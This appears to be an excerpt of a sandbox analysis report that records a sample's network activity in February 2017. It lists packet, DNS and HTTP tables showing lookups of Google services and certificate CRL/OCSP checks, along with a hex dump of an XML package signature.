Data ASCII:	< ? x m l v e r s i o n = " 1 . 0 " e n c o d i n g = " U T F - 8 " ? > < S i g n a t u r e x m l n s = " h t t p : / / w w w . w 3 . o r g / 2 0 0 0 / 0 9 / x m l d s i g # " I d = " i d P a c k a g e S i g n a t u r e " > < S i g n e d I n f o > < C a n o n i c a l i z a t i o n M e t h o d A l g o r i t h m = " h t t p : / / w w w . w 3 . o r g / T R / 2 0 0 1 / R E C - x m l - c 1 4 n - 2 0 0 1 0 3 1 5 " / > < S i g n a t u r e M e t h o d A l g o r i t h m = " h t t p : / / w w w . w 3 . o
Data Raw:	3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 53 69 67 6e 61 74 75 72 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 22 20 49 64 3d 22 69 64 50 61 63 6b 61 67 65 53 69 67 6e 61 74 75 72 65 22 3e 3c 53 69 67 6e 65 64 49 6e 66 6f 3e

Network Behavior

Download Network PCAP:	Network PCAP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 3, 2017 13:21:30.046524048 CET	52380	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:30.322197914 CET	53	52380	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:30.339765072 CET	49162	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:30.339813948 CET	443	49162	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:30.339890003 CET	49162	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:30.350121021 CET	49162	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:30.350151062 CET	443	49162	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:31.061212063 CET	443	49162	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:31.061237097 CET	443	49162	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:31.061249971 CET	443	49162	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:31.061343908 CET	49162	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:31.082077980 CET	443	49162	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:31.082222939 CET	49162	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:31.118853092 CET	49162	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:31.118871927 CET	443	49162	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:31.466020107 CET	443	49162	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:31.466111898 CET	49162	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:31.885040998 CET	58054	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:32.240303040 CET	53	58054	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:32.244097948 CET	55399	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:32.477293968 CET	53	55399	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:33.041954041 CET	53010	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:33.390506029 CET	53	53010	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:33.401477098 CET	52401	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:33.641087055 CET	53	52401	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:33.644304037 CET	49164	80	192.168.1.16	23.51.117.163
Feb 3, 2017 13:21:33.644361019 CET	80	49164	23.51.117.163	192.168.1.16
Feb 3, 2017 13:21:33.644537926 CET	49164	80	192.168.1.16	23.51.117.163
Feb 3, 2017 13:21:33.645129919 CET	49164	80	192.168.1.16	23.51.117.163
Feb 3, 2017 13:21:33.645164013 CET	80	49164	23.51.117.163	192.168.1.16
Feb 3, 2017 13:21:34.076262951 CET	80	49164	23.51.117.163	192.168.1.16
Feb 3, 2017 13:21:34.183749914 CET	53278	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:34.276438951 CET	80	49164	23.51.117.163	192.168.1.16
Feb 3, 2017 13:21:34.276707888 CET	49164	80	192.168.1.16	23.51.117.163
Feb 3, 2017 13:21:34.466198921 CET	53	53278	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:34.475553989 CET	64052	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:34.707212925 CET	53	64052	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:34.708375931 CET	49165	80	192.168.1.16	23.43.139.27
Feb 3, 2017 13:21:34.708429098 CET	80	49165	23.43.139.27	192.168.1.16
Feb 3, 2017 13:21:34.708523035 CET	49165	80	192.168.1.16	23.43.139.27
Feb 3, 2017 13:21:34.708909988 CET	49165	80	192.168.1.16	23.43.139.27
Feb 3, 2017 13:21:34.708930969 CET	80	49165	23.43.139.27	192.168.1.16
Feb 3, 2017 13:21:35.102711916 CET	80	49165	23.43.139.27	192.168.1.16
Feb 3, 2017 13:21:35.102744102 CET	80	49165	23.43.139.27	192.168.1.16
Feb 3, 2017 13:21:35.102998018 CET	49165	80	192.168.1.16	23.43.139.27
Feb 3, 2017 13:21:35.220506907 CET	58256	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:35.456484079 CET	53	58256	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:35.462969065 CET	49178	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:35.694485903 CET	53	49178	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:35.696316957 CET	49166	80	192.168.1.16	74.125.232.238
Feb 3, 2017 13:21:35.696408987 CET	80	49166	74.125.232.238	192.168.1.16
Feb 3, 2017 13:21:35.696583986 CET	49166	80	192.168.1.16	74.125.232.238
Feb 3, 2017 13:21:35.697237968 CET	49166	80	192.168.1.16	74.125.232.238
Feb 3, 2017 13:21:35.697273970 CET	80	49166	74.125.232.238	192.168.1.16
Feb 3, 2017 13:21:36.214596987 CET	80	49166	74.125.232.238	192.168.1.16
Feb 3, 2017 13:21:36.233733892 CET	49162	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:36.233757973 CET	443	49162	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:36.234179020 CET	49162	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:36.234194994 CET	443	49162	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:36.416430950 CET	80	49166	74.125.232.238	192.168.1.16
Feb 3, 2017 13:21:36.416605949 CET	49166	80	192.168.1.16	74.125.232.238
Feb 3, 2017 13:21:36.859767914 CET	443	49162	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:36.859987020 CET	49162	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:36.874950886 CET	49162	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:36.875072956 CET	443	49162	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:36.875163078 CET	49162	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:36.879256010 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:36.879291058 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:36.879375935 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:36.880064964 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:36.880084991 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:37.316308975 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:37.316502094 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:37.317208052 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:37.317241907 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:37.341294050 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:37.341317892 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.426789999 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.427006006 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:38.428414106 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.428456068 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.428467035 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.428574085 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:38.440733910 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.440758944 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.440768957 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.440890074 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:38.440915108 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.441035986 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:38.524521112 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.524549961 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.524791002 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:38.538294077 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.538326979 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.538569927 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:38.554888964 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.554913998 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.554923058 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.555155039 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:38.627758026 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.627785921 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.627795935 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:21:38.628140926 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:21:39.809606075 CET	54872	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:40.109858990 CET	53	54872	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:40.216468096 CET	65034	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:40.448889971 CET	53	65034	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:40.449740887 CET	49168	443	192.168.1.16	172.217.22.46
Feb 3, 2017 13:21:40.449780941 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:40.449893951 CET	49168	443	192.168.1.16	172.217.22.46
Feb 3, 2017 13:21:40.469163895 CET	49168	443	192.168.1.16	172.217.22.46
Feb 3, 2017 13:21:40.469191074 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:40.794019938 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:40.794051886 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:40.794068098 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:40.794212103 CET	49168	443	192.168.1.16	172.217.22.46
Feb 3, 2017 13:21:40.892060995 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:40.907182932 CET	49168	443	192.168.1.16	172.217.22.46
Feb 3, 2017 13:21:40.907217979 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:41.148633003 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:41.352432966 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:41.352523088 CET	49168	443	192.168.1.16	172.217.22.46
Feb 3, 2017 13:21:41.573354006 CET	49168	443	192.168.1.16	172.217.22.46
Feb 3, 2017 13:21:41.573376894 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:41.962523937 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:41.962548018 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:41.962557077 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:41.962634087 CET	49168	443	192.168.1.16	172.217.22.46
Feb 3, 2017 13:21:42.019470930 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:42.220429897 CET	443	49168	172.217.22.46	192.168.1.16
Feb 3, 2017 13:21:42.220552921 CET	49168	443	192.168.1.16	172.217.22.46
Feb 3, 2017 13:21:57.420198917 CET	80	49165	23.43.139.27	192.168.1.16
Feb 3, 2017 13:21:57.420351028 CET	49165	80	192.168.1.16	23.43.139.27
Feb 3, 2017 13:21:57.420552969 CET	49165	80	192.168.1.16	23.43.139.27
Feb 3, 2017 13:21:57.420586109 CET	80	49165	23.43.139.27	192.168.1.16
Feb 3, 2017 13:22:14.934688091 CET	80	49164	23.51.117.163	192.168.1.16
Feb 3, 2017 13:22:14.934828043 CET	49164	80	192.168.1.16	23.51.117.163
Feb 3, 2017 13:22:14.934962034 CET	49164	80	192.168.1.16	23.51.117.163
Feb 3, 2017 13:22:14.934988022 CET	80	49164	23.51.117.163	192.168.1.16
Feb 3, 2017 13:22:36.220221043 CET	49166	80	192.168.1.16	74.125.232.238
Feb 3, 2017 13:23:29.721219063 CET	49167	443	192.168.1.16	216.58.206.14
Feb 3, 2017 13:23:29.721396923 CET	443	49167	216.58.206.14	192.168.1.16
Feb 3, 2017 13:23:29.721539021 CET	49167	443	192.168.1.16	216.58.206.14

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 3, 2017 13:21:30.046524048 CET	52380	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:30.322197914 CET	53	52380	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:31.885040998 CET	58054	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:32.240303040 CET	53	58054	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:32.244097948 CET	55399	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:32.477293968 CET	53	55399	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:33.041954041 CET	53010	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:33.390506029 CET	53	53010	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:33.401477098 CET	52401	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:33.641087055 CET	53	52401	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:34.183749914 CET	53278	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:34.466198921 CET	53	53278	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:34.475553989 CET	64052	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:34.707212925 CET	53	64052	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:35.220506907 CET	58256	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:35.456484079 CET	53	58256	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:35.462969065 CET	49178	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:35.694485903 CET	53	49178	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:39.809606075 CET	54872	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:40.109858990 CET	53	54872	8.8.8.8	192.168.1.16
Feb 3, 2017 13:21:40.216468096 CET	65034	53	192.168.1.16	8.8.8.8
Feb 3, 2017 13:21:40.448889971 CET	53	65034	8.8.8.8	192.168.1.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 3, 2017 13:21:30.046524048 CET	192.168.1.16	8.8.8.8	0x42e3	Standard query (0)	docs.google.com	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:33.041954041 CET	192.168.1.16	8.8.8.8	0xe092	Standard query (0)	crl.geotrust.com	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:33.401477098 CET	192.168.1.16	8.8.8.8	0xcd35	Standard query (0)	crl.geotrust.com	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:34.183749914 CET	192.168.1.16	8.8.8.8	0x1de9	Standard query (0)	g.symcd.com	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:34.475553989 CET	192.168.1.16	8.8.8.8	0x81ac	Standard query (0)	g.symcd.com	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:35.220506907 CET	192.168.1.16	8.8.8.8	0xee5	Standard query (0)	clients1.google.com	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:35.462969065 CET	192.168.1.16	8.8.8.8	0xfe43	Standard query (0)	clients1.google.com	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:39.809606075 CET	192.168.1.16	8.8.8.8	0x4669	Standard query (0)	script.google.com	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:40.216468096 CET	192.168.1.16	8.8.8.8	0x41cc	Standard query (0)	script.google.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	Address	Type	Class
Feb 3, 2017 13:21:30.322197914 CET	8.8.8.8	192.168.1.16	0x42e3	No error (0)	docs.google.com	216.58.206.14	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:33.390506029 CET	8.8.8.8	192.168.1.16	0xe092	No error (0)	crl.geotrust.com	23.51.117.163	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:33.641087055 CET	8.8.8.8	192.168.1.16	0xcd35	No error (0)	crl.geotrust.com	23.51.117.163	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:34.466198921 CET	8.8.8.8	192.168.1.16	0x1de9	No error (0)	g.symcd.com	23.43.139.27	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:34.707212925 CET	8.8.8.8	192.168.1.16	0x81ac	No error (0)	g.symcd.com	23.43.139.27	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:35.456484079 CET	8.8.8.8	192.168.1.16	0xee5	No error (0)	clients1.google.com	74.125.232.238	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:35.694485903 CET	8.8.8.8	192.168.1.16	0xfe43	No error (0)	clients1.google.com	74.125.232.238	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:40.109858990 CET	8.8.8.8	192.168.1.16	0x4669	No error (0)	script.google.com	172.217.22.46	A (IP address)	IN (0x0001)
Feb 3, 2017 13:21:40.448889971 CET	8.8.8.8	192.168.1.16	0x41cc	No error (0)	script.google.com	172.217.22.46	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

crl.geotrust.com

g.symcd.com

clients1.google.com

HTTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header	Total Bytes Transfered (KB)
Feb 3, 2017 13:21:33.645129919 CET	49164	80	192.168.1.16	23.51.117.163	GET /crls/secureca.crl HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: crl.geotrust.com	7
Feb 3, 2017 13:21:34.076262951 CET	80	49164	23.51.117.163	192.168.1.16	HTTP/1.1 200 OK Server: Apache ETag: "de39111c2ef097408044541a3ec76702:1486124120" Last-Modified: Fri, 03 Feb 2017 12:15:20 GMT Date: Fri, 03 Feb 2017 12:21:33 GMT Content-Length: 325 Connection: keep-alive Content-Type: application/pkix-crl Data Raw: 30 82 01 41 30 81 ab 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 30 4e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 10 30 0e 06 03 55 04 0a 13 07 45 71 75 69 66 61 78 31 2d 30 2b 06 03 55 04 0b 13 24 45 71 75 69 66 61 78 20 53 65 63 75 72 65 20 43 65 72 74 69 66 69 63 61 74 65 20 41 75 74 68 6f 72 69 74 79 17 0d 31 37 30 32 30 33 31 32 30 33 30 30 5a 17 0d 31 37 30 32 31 33 31 32 30 33 30 30 5a 30 2c 30 14 02 03 03 25 85 17 0d 30 32 30 35 31 34 31 38 31 31 35 37 5a 30 14 02 03 03 1e 33 17 0d 30 32 30 35 31 35 31 33 30 36 31 31 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 41 01 06 b7 58 07 b9 4c 9b f9 83 e9 12 1d 93 fe 3f 96 23 b8 68 54 df 8c 3a 79 8f 04 7d 3e 54 3a 33 be 4d 5f 23 56 55 75 ff c4 14 4e 5c 3a 95 d2 a8 b3 f7 e4 57 1d c6 ec ee 3a 9f 15 98 3c 5a c1 4a 47 31 ff cf 00 77 ec 31 d7 09 db e0 48 8e ab 95 b4 1c a2 8f 69 fc 9d 57 2e 9a b4 17 7c ee 0d 73 4c b8 ed 9d b5 4f 3c 9c c6 30 8d ed 6d 8f 00 d1 35 7d 9b db 6c 63 f5 1a 19 ba d6 d5 37 06 6b Data Ascii: 0A00H0N10UUS10UEquifax1-0+U$Equifax Secure Certificate Authority170203120300Z170213120300Z0,0%020514181157Z03020515130611Z0HAXL?#hT:y}>T:3M_#VUuN\:W:<ZJG1w1HiW.\|sLO<0m5}lc7k	8
Feb 3, 2017 13:21:34.276438951 CET	80	49164	23.51.117.163	192.168.1.16	HTTP/1.1 200 OK Server: Apache ETag: "de39111c2ef097408044541a3ec76702:1486124120" Last-Modified: Fri, 03 Feb 2017 12:15:20 GMT Date: Fri, 03 Feb 2017 12:21:33 GMT Content-Length: 325 Connection: keep-alive Content-Type: application/pkix-crl Data Raw: 30 82 01 41 30 81 ab 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 30 4e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 10 30 0e 06 03 55 04 0a 13 07 45 71 75 69 66 61 78 31 2d 30 2b 06 03 55 04 0b 13 24 45 71 75 69 66 61 78 20 53 65 63 75 72 65 20 43 65 72 74 69 66 69 63 61 74 65 20 41 75 74 68 6f 72 69 74 79 17 0d 31 37 30 32 30 33 31 32 30 33 30 30 5a 17 0d 31 37 30 32 31 33 31 32 30 33 30 30 5a 30 2c 30 14 02 03 03 25 85 17 0d 30 32 30 35 31 34 31 38 31 31 35 37 5a 30 14 02 03 03 1e 33 17 0d 30 32 30 35 31 35 31 33 30 36 31 31 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 41 01 06 b7 58 07 b9 4c 9b f9 83 e9 12 1d 93 fe 3f 96 23 b8 68 54 df 8c 3a 79 8f 04 7d 3e 54 3a 33 be 4d 5f 23 56 55 75 ff c4 14 4e 5c 3a 95 d2 a8 b3 f7 e4 57 1d c6 ec ee 3a 9f 15 98 3c 5a c1 4a 47 31 ff cf 00 77 ec 31 d7 09 db e0 48 8e ab 95 b4 1c a2 8f 69 fc 9d 57 2e 9a b4 17 7c ee 0d 73 4c b8 ed 9d b5 4f 3c 9c c6 30 8d ed 6d 8f 00 d1 35 7d 9b db 6c 63 f5 1a 19 ba d6 d5 37 06 6b Data Ascii: 0A00H0N10UUS10UEquifax1-0+U$Equifax Secure Certificate Authority170203120300Z170213120300Z0,0%020514181157Z03020515130611Z0HAXL?#hT:y}>T:3M_#VUuN\:W:<ZJG1w1HiW.\|sLO<0m5}lc7k	8
Feb 3, 2017 13:21:34.708909988 CET	49165	80	192.168.1.16	23.43.139.27	GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: g.symcd.com	9
Feb 3, 2017 13:21:35.102711916 CET	80	49165	23.43.139.27	192.168.1.16	HTTP/1.1 200 OK Server: nginx/1.10.2 Content-Type: application/ocsp-response Content-Length: 1377 content-transfer-encoding: binary Cache-Control: max-age=334115, public, no-transform, must-revalidate Last-Modified: Tue, 31 Jan 2017 09:08:38 GMT Expires: Tue, 7 Feb 2017 09:08:38 GMT Date: Fri, 03 Feb 2017 12:21:34 GMT Connection: keep-alive Data Raw: 30 82 05 5d 0a 01 00 a0 82 05 56 30 82 05 52 06 09 2b 06 01 05 05 07 30 01 01 04 82 05 43 30 82 05 3f 30 81 91 a2 16 04 14 56 e4 54 27 53 e6 ac a9 71 81 dd 86 22 1e 9a e4 7a 72 c4 2a 18 0f 32 30 31 37 30 31 33 31 30 39 30 38 33 38 5a 30 66 30 64 30 3c 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 b1 b4 39 17 90 16 b7 97 79 50 11 f1 60 b9 d4 a2 3c db ed ee 04 14 00 f9 2a c3 41 91 b6 c9 c2 b8 3e 55 f2 c0 97 11 13 a0 07 20 02 03 02 3a 92 80 00 18 0f 32 30 31 37 30 31 33 31 30 39 30 38 33 38 5a a0 11 18 0f 32 30 31 37 30 32 30 37 30 39 30 38 33 38 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 21 30 96 23 83 a3 68 ab e1 5a 71 cd d0 13 9d aa 80 29 82 7f 4e 82 f3 2e ce 77 b4 45 21 97 5e b4 ac d5 cd ba 3a 55 43 18 f5 cc 5b 74 9f 67 63 78 e7 bb c6 51 65 e7 23 c5 c5 7d 2f dc 58 7a be 0b 50 ec 6d 92 ed 82 93 14 31 b3 d1 96 f3 01 cb 30 8d 87 09 3c 74 d5 83 dc 26 86 2b bf 74 11 8f e0 2b 79 18 04 f5 72 47 30 be 9d a9 7c 3a 2f 2e a9 b9 2b 2e e5 14 e3 39 43 26 c5 1e 5c 44 55 8b 07 50 00 40 5d ae cd 61 ba 6a 31 9f de 63 5a 5f 34 48 49 92 fe 0b a8 5b 2e 08 da c9 b1 b1 68 cd 3a 7e ed e8 26 72 06 26 be b6 22 73 90 e7 56 56 54 26 8e b7 61 c2 72 29 a0 20 02 66 ed 2c 8f 03 91 3c 8f 7d 92 1e e6 b2 51 27 e3 c1 ba 0f fb d4 c0 02 8f b5 26 d0 bc de 9d f4 61 ba 6c 69 b3 a2 69 cd e6 5d 3f 93 fa 53 bc 57 76 57 07 be d5 62 bb eb 6e 38 8f 21 52 3c 6c 66 e3 f8 df fc 27 db 3b a0 82 03 93 30 82 03 8f 30 82 03 8b 30 82 02 73 a0 03 02 01 02 02 10 01 00 00 8f 1c 2b 96 15 f5 79 b9 18 5e 0e c2 67 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 42 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 16 30 14 06 03 55 04 0a 13 0d 47 65 6f 54 72 75 73 74 20 49 6e 63 2e 31 1b 30 19 06 03 55 04 03 13 12 47 65 6f 54 72 75 73 74 20 47 6c 6f 62 61 6c 20 43 41 30 1e 17 0d 31 36 31 32 30 38 31 31 32 35 33 35 5a 17 0d 31 37 31 32 31 34 31 31 32 35 33 35 5a 30 32 31 30 30 2e 06 03 55 04 03 13 27 47 65 6f 54 72 75 73 74 20 47 6c 6f 62 61 6c 20 43 41 20 54 47 56 20 4f 43 53 50 20 52 65 73 70 6f 6e 64 65 72 20 35 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 a6 ec c7 bd 9e c7 89 53 08 90 f2 de 21 c0 cb 8e f3 2c e0 74 df 3f 04 b9 c4 83 64 84 0c 8e 4d 40 e5 a6 5f ab 3d 0c 53 91 c7 2c eb 22 ef a1 10 a3 ab 98 47 64 76 ae 5f 63 81 0d 44 31 b7 b4 4e 27 45 c9 3a e1 b1 ee b7 ae 61 32 cd 0b ac cf bb 04 8e 7b 2f 72 44 fb 2b ff 63 e8 32 e6 94 50 7f ea 81 21 02 0c 1f 08 e3 58 6e b0 ce 7d 01 c1 0a d7 7b 7b ec 7a 49 39 b4 59 e2 82 17 8f d0 a9 2f 82 e5 94 d4 13 3b 0d 8e 17 00 a9 e0 0c 66 75 84 a3 2c 89 e8 ea 42 88 5f 6f 0d b9 42 19 af 67 96 1d d2 c1 6f a7 c4 a4 ea aa a8 8c 97 3f 59 5c df 3f fc 81 eb 79 cb 48 2a cc c4 5d 79 69 be da f8 c0 90 33 d0 aa d4 0d f1 0d a8 46 ca 36 8b 8f d1 fb f5 51 e9 e8 e5 9e ed b9 ed c2 9c 7b 42 17 e4 31 39 05 c3 4b 7a ca ad 02 5c 7a c2 8c ac 50 bd f8 ce 5f ad b4 2e 2d 21 b3 f5 e7 bf c4 27 e7 59 6d 02 03 01 00 01 a3 81 8c 30 81 89 30 1f 06 03 55 1d 23 04 18 30 16 80 14 c0 7a 98 68 8d 89 fb ab 05 64 0c 11 7d aa 7d 65 b8 ca cc 4e 30 0f 06 09 2b 06 01 05 05 07 30 01 05 04 02 05 00 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 09 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 07 80 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00 30 22 06 03 55 1d 11 04 1b 30 19 a4 17 30 15 31 13 30 11 06 03 55 04 03 13 0a 54 47 56 2d 4f 46 46 2d 35 37 30 0d 06 09 Data Ascii: 0]V0R+0C0?0VT'Sq"zr20170131090838Z0f0d0<0+9yP`<A>U :20170131090838Z20170207090838Z0H!0#hZq)N.wE!^:UC[tgcxQe#}/XzPm10<t&+t+yrG0\|:/.+.9C&\DUP@]aj1cZ_4HI[.h:~&r&"sVVT&ar) 